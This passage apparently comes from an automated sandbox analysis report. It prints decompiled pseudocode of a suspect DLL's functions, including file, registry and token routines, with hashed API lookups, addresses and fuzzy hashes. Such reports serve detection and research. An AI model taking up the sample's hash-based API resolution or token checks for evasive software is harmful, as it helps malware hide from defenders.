							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6E7D3698(_t59, 0xff, 8);
						if(E6E7D3064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}

0x6e7d5b43
0x6e7d5b45
0x6e7d5b52
0x6e7d5b56
0x6e7d5b5a
0x6e7d5b64
0x6e7d5b6b
0x6e7d5b6b
0x6e7d5b72
0x6e7d5b74
0x6e7d5b79
0x6e7d5b82
0x6e7d5b8a
0x6e7d5b8a
0x6e7d5b7b
0x6e7d5b7d
0x6e7d5b7d
0x6e7d5b79
0x6e7d5b8f
0x6e7d5b9b
0x6e7d5ccc
0x6e7d5c09
0x6e7d5c12
0x6e7d5c13
0x6e7d5c18
0x6e7d5c19
0x6e7d5c0b
0x6e7d5c0d
0x6e7d5c0d
0x6e7d5c2f
0x6e7d5c43
0x6e7d5c31
0x6e7d5c3e
0x6e7d5c40
0x6e7d5c40
0x6e7d5c45
0x6e7d5c4a
0x6e7d5c58
0x6e7d5cc3
0x00000000
0x6e7d5c5a
0x6e7d5c5f
0x6e7d5cac
0x6e7d5cae
0x6e7d5cb0
0x6e7d5cba
0x6e7d5cba
0x6e7d5cb0
0x6e7d5c61
0x6e7d5c6d
0x6e7d5c86
0x6e7d5c88
0x6e7d5c89
0x6e7d5c8a
0x6e7d5c8c
0x6e7d5c8e
0x6e7d5c8f
0x6e7d5c8f
0x00000000
0x6e7d5c92
0x6e7d5ba1
0x6e7d5bb1
0x6e7d5bb1

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 043f6d480560516afdba5d734babfdb9976e72a1bf7b9c377ae528e96dc1227c
Instruction ID: b06202a1e306299a73a34715eefc5d42a2aaf2abf00919358aa043ea3dd1274f
Opcode Fuzzy Hash: 043f6d480560516afdba5d734babfdb9976e72a1bf7b9c377ae528e96dc1227c
Instruction Fuzzy Hash: 4431F43038430AFFE7502AF56F98F6B769DDB81649F004838FA49951B5EA21991CCB62

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D1166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E7D1166(intOrPtr* __eax, void* __ebx, void* __ecx) {
				void* _t20;

				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(_t20 + 0x50182444)) =  *((intOrPtr*)(_t20 + 0x50182444)) + __ecx;
			}

0x6e7d1168
0x6e7d116a

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E7D117B

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 8162e476bed466b15e8bf967a0abe15d034c35eef06e00be9545f18c94d02dd7
Instruction ID: 6de6df071d71042f165a8350aa08dec46c600a9739d842376c344d673c44a524
Opcode Fuzzy Hash: 8162e476bed466b15e8bf967a0abe15d034c35eef06e00be9545f18c94d02dd7
Instruction Fuzzy Hash: A4110A707042835AFB5695E8DE74BAF76589F42700F104875E860D60F4CA26E88DCA62

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6E7D5BE5(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6E7D3064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6E7CC26C(_t24);
					if(E6E7CC280(_t24) != 0) {
						_t33[2] = E6E7D35F0(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6E7D3064(0x8e844d1e, 0xba53868);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6E7D3698(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6E7D3064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}

0x6e7d5be5
0x6e7d5be7
0x6e7d5bfe
0x6e7d5c09
0x6e7d5c12
0x6e7d5c18
0x6e7d5c19
0x6e7d5c0b
0x6e7d5c0d
0x6e7d5c0d
0x6e7d5c2f
0x6e7d5c43
0x6e7d5c31
0x6e7d5c3e
0x6e7d5c40
0x6e7d5c40
0x6e7d5c45
0x6e7d5c4a
0x6e7d5c58
0x6e7d5cc3
0x6e7d5cc6
0x6e7d5c5a
0x6e7d5c5f
0x6e7d5cac
0x6e7d5cb0
0x6e7d5cba
0x6e7d5cba
0x6e7d5cb0
0x6e7d5c61
0x6e7d5c6d
0x6e7d5c72
0x6e7d5c86
0x6e7d5c88
0x6e7d5c89
0x6e7d5c8a
0x6e7d5c8c
0x6e7d5c8e
0x6e7d5c8f
0x6e7d5c8f
0x6e7d5c92
0x6e7d5c92
0x6e7d5be9
0x6e7d5be9
0x6e7d5bf0
0x6e7d5bf0
0x6e7d5c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E7D5C3E

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction ID: 09f3a1bc6dabb7f80e3d005c7bd6a5f40c4933f61ae827d3b763dc1d969ae4a3
Opcode Fuzzy Hash: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction Fuzzy Hash: 9701263528420BFFF7501AE56F49F6B774DDB81649F004835B909951A4EF22A45CC721

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6E7D5BBD(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E7D3064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E7CC26C(_t24);
				if(E6E7CC280(_t24) != 0) {
					_t34[2] = E6E7D35F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6E7D3064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6E7D3698(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6E7D3064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6e7d5bbd
0x6e7d5bc1
0x6e7d5bc4
0x6e7d5bc7
0x6e7d5c09
0x6e7d5c12
0x6e7d5c18
0x6e7d5c19
0x6e7d5c0b
0x6e7d5c0d
0x6e7d5c0d
0x6e7d5c2f
0x6e7d5c43
0x6e7d5c31
0x6e7d5c3e
0x6e7d5c40
0x6e7d5c40
0x6e7d5c45
0x6e7d5c4a
0x6e7d5c58
0x6e7d5cc3
0x6e7d5cc6
0x6e7d5c5a
0x6e7d5c5f
0x6e7d5cac
0x6e7d5cb0
0x6e7d5cba
0x6e7d5cba
0x6e7d5cb0
0x6e7d5c61
0x6e7d5c6d
0x6e7d5c72
0x6e7d5c86
0x6e7d5c88
0x6e7d5c89
0x6e7d5c8a
0x6e7d5c8c
0x6e7d5c8e
0x6e7d5c8f
0x6e7d5c8f
0x6e7d5c92
0x6e7d5c92
0x6e7d5c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E7D5C3E

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction ID: ac12b5898d26eb4416aad330175442c9b504089780d119b2531a869e92d86c9a
Opcode Fuzzy Hash: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction Fuzzy Hash: FB01263138030BFFFA502AE46F09F7B774DCFC1659F004831BA05951A5EA12685DC621

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6E7D5BD1(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E7D3064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E7CC26C(_t24);
				if(E6E7CC280(_t24) != 0) {
					_t34[2] = E6E7D35F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6E7D3064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6E7D3698(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6E7D3064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6e7d5bd1
0x6e7d5bd8
0x6e7d5bdb
0x6e7d5c09
0x6e7d5c12
0x6e7d5c18
0x6e7d5c19
0x6e7d5c0b
0x6e7d5c0d
0x6e7d5c0d
0x6e7d5c2f
0x6e7d5c43
0x6e7d5c31
0x6e7d5c3e
0x6e7d5c40
0x6e7d5c40
0x6e7d5c45
0x6e7d5c4a
0x6e7d5c58
0x6e7d5cc3
0x6e7d5cc6
0x6e7d5c5a
0x6e7d5c5f
0x6e7d5cac
0x6e7d5cb0
0x6e7d5cba
0x6e7d5cba
0x6e7d5cb0
0x6e7d5c61
0x6e7d5c6d
0x6e7d5c72
0x6e7d5c86
0x6e7d5c88
0x6e7d5c89
0x6e7d5c8a
0x6e7d5c8c
0x6e7d5c8e
0x6e7d5c8f
0x6e7d5c8f
0x6e7d5c92
0x6e7d5c92
0x6e7d5c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E7D5C3E

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction ID: f7c0209ee60242e432f8e4c60cc08fe50026320f51b46eca470a845ac3867aac
Opcode Fuzzy Hash: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction Fuzzy Hash: 0301453538020BFFF7502AE56F48F7B724ECB81659F004831BA09951E9EE22685CC721

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6E7D5BB3(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E7D3064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E7CC26C(_t23);
				if(E6E7CC280(_t23) != 0) {
					_t31[2] = E6E7D35F0(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E7D3064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E7D3698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6E7D3064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6e7d5bb3
0x6e7d5bba
0x6e7d5c09
0x6e7d5c12
0x6e7d5c18
0x6e7d5c19
0x6e7d5c0b
0x6e7d5c0d
0x6e7d5c0d
0x6e7d5c2f
0x6e7d5c43
0x6e7d5c31
0x6e7d5c3e
0x6e7d5c40
0x6e7d5c40
0x6e7d5c45
0x6e7d5c4a
0x6e7d5c58
0x6e7d5cc3
0x6e7d5cc6
0x6e7d5c5a
0x6e7d5c5f
0x6e7d5cac
0x6e7d5cb0
0x6e7d5cba
0x6e7d5cba
0x6e7d5cb0
0x6e7d5c61
0x6e7d5c6d
0x6e7d5c72
0x6e7d5c86
0x6e7d5c88
0x6e7d5c89
0x6e7d5c8a
0x6e7d5c8c
0x6e7d5c8e
0x6e7d5c8f
0x6e7d5c8f
0x6e7d5c92
0x6e7d5c92
0x6e7d5c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E7D5C3E

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction ID: 54657d8a276cd24aa600885e6808349e449a21a584977fa1d790355de8fbadc7
Opcode Fuzzy Hash: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction Fuzzy Hash: 3901243128020BFBFA502AE46F48F7B764DCB81659F004835BA09A51A4EE12685CC731

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6E7D5C01(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E7D3064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E7CC26C(_t23);
				if(E6E7CC280(_t23) != 0) {
					_t31[2] = E6E7D35F0(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E7D3064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E7D3698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6E7D3064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6e7d5c01
0x6e7d5c05
0x6e7d5c09
0x6e7d5c12
0x6e7d5c18
0x6e7d5c19
0x6e7d5c0b
0x6e7d5c0d
0x6e7d5c0d
0x6e7d5c2f
0x6e7d5c43
0x6e7d5c31
0x6e7d5c3e
0x6e7d5c40
0x6e7d5c40
0x6e7d5c45
0x6e7d5c4a
0x6e7d5c58
0x6e7d5cc3
0x6e7d5cc6
0x6e7d5c5a
0x6e7d5c5f
0x6e7d5cac
0x6e7d5cb0
0x6e7d5cba
0x6e7d5cba
0x6e7d5cb0
0x6e7d5c61
0x6e7d5c6d
0x6e7d5c72
0x6e7d5c86
0x6e7d5c88
0x6e7d5c89
0x6e7d5c8a
0x6e7d5c8c
0x6e7d5c8e
0x6e7d5c8f
0x6e7d5c8f
0x6e7d5c92
0x6e7d5c92
0x6e7d5c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E7D5C3E

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction ID: b5fdc7bdf72db2ddef436fd0e88e8367f30bdad6871668a62aadd87d2bfc7cb4
Opcode Fuzzy Hash: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction Fuzzy Hash: 3401F73528020BFBE6502AE16F48F7B774DDF81659F004835BA09951A5EE12655DC731

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6E7D5E10(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6E7CC280(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6E7D3064(0x8e844d1e, 0xba53868) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6e7d5e14
0x6e7d5e15
0x6e7d5e17
0x6e7d5e1d
0x6e7d5e1f
0x6e7d5e23
0x6e7d5e23
0x6e7d5e27
0x6e7d5e33
0x6e7d5e67
0x6e7d5e67
0x00000000
0x6e7d5e35
0x6e7d5e3a
0x6e7d5e3b
0x6e7d5e4f
0x6e7d5e60
0x6e7d5e51
0x6e7d5e5c
0x6e7d5e5c
0x6e7d5e65
0x6e7d5e6d
0x6e7d5e6f
0x6e7d5e72
0x6e7d5e77
0x6e7d5e77
0x6e7d5e7b
0x6e7d5e80
0x00000000
0x00000000
0x00000000
0x6e7d5e65

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,0BA53868,?,?,00000000,00000000,?,6E7D5D48,?,?), ref: 6E7D5E5C

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction ID: 82db7b8e3b4325a23b9610a81b35dfa8820d16f4e35c6103abb7c61bcf381bcb
Opcode Fuzzy Hash: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction Fuzzy Hash: 59F04E31608B12FBD75169B8AD40B8773DCDFD1750F104F39F5409A164EA6088488651

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E7D564C(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6E7D3064(0x150c05fc, 0xed2313f7) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6E7CE644(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6e7d5656
0x6e7d5658
0x6e7d565f
0x6e7d5661
0x6e7d5665
0x6e7d5667
0x6e7d566a
0x6e7d566d
0x6e7d566d
0x6e7d5687
0x00000000
0x00000000
0x6e7d5698
0x6e7d569c
0x00000000
0x00000000
0x6e7d56aa
0x6e7d56ad
0x6e7d56b2
0x6e7d56b7
0x6e7d56b7

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,150C05FC,ED2313F7,?,?,150C05FC,ED2313F7), ref: 6E7D5698

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction ID: ae8c8b278151af36be40bf909e67de059dbb07494e4a7d36f4926d841653f1cc
Opcode Fuzzy Hash: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction Fuzzy Hash: 72F0C8B520030AAFE7249E5ADD54DB7BBFDDBC1B50F00852DA0D542110EA31AC54C971

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D1030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6E7D1030(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6E7D306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6E7D306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x150c05f8
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6e7d103e
0x6e7d1040
0x6e7d104e
0x6e7d1052
0x6e7d109b
0x00000000
0x6e7d109b
0x6e7d1057
0x6e7d1058
0x6e7d105a
0x6e7d105f
0x00000000
0x6e7d1078
0x6e7d107c
0x6e7d1089
0x6e7d108d
0x00000000
0x00000000
0x00000000
0x6e7d1096

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,150C05F8,00000004,150C05FC,150C05FC,150C05FC), ref: 6E7D1089

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
